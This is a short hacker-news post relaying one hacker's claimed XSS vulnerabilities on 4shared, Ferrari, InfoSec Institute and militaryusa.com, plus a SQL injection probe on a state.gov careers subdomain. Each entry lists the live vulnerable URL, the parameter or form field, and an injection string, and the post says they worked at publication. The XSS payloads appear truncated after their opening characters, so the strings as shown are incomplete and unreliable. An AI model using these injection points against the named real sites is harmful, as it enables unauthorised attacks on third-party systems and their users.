Image Credit- 101hacker.com |
Hacker named @Charafanons found XSS Vulnerability in 5 Major Websites and these websites have a good standing on the Internet, @Charafanons sent a Tweet to us that he has found XSS Vulnerability in #4shared, #Ferrari, #InfoSec, #militaryUsa, #StateGov.
We tested all the XSS Vulnerabilitiesand they are working at the time of publishing this news.
Here is the description of all the XSS Vulnerabilities:
4Shared :
http://www.4shared.com/web/acc/signup?login=”>
Proof : http://charafanons.net/xss/proof/4shared.png
————————————————————
Military usa :
http://www.militaryusa.com/cgi-bin/passwordreminder.cgi
in email form put : “>
Proof : http://charafanons.net/xss/proof/milusa.png
————————————————————
Info-Sec :
http://www.infosecinstitute.com/view_course_info.php?coursecode=SC&infotype=”>
Proof : http://charafanons.net/xss/proof/infosec.png < === Fixed
————————————————————
Ferrari :
http://www.ferrari.com/English/Formula1/Search/Pages/AllCategories.aspx?k=”>
Proof: http://charafanons.net/xss/proof/ferrari.png
————————————————————
Bonus : SQL injection in state.gov subdomain
http://careers.state.gov/survey/StateCareers/ThankYou.php?userid=58050%27
Proof : http://charafanons.net/xss/proof/state.png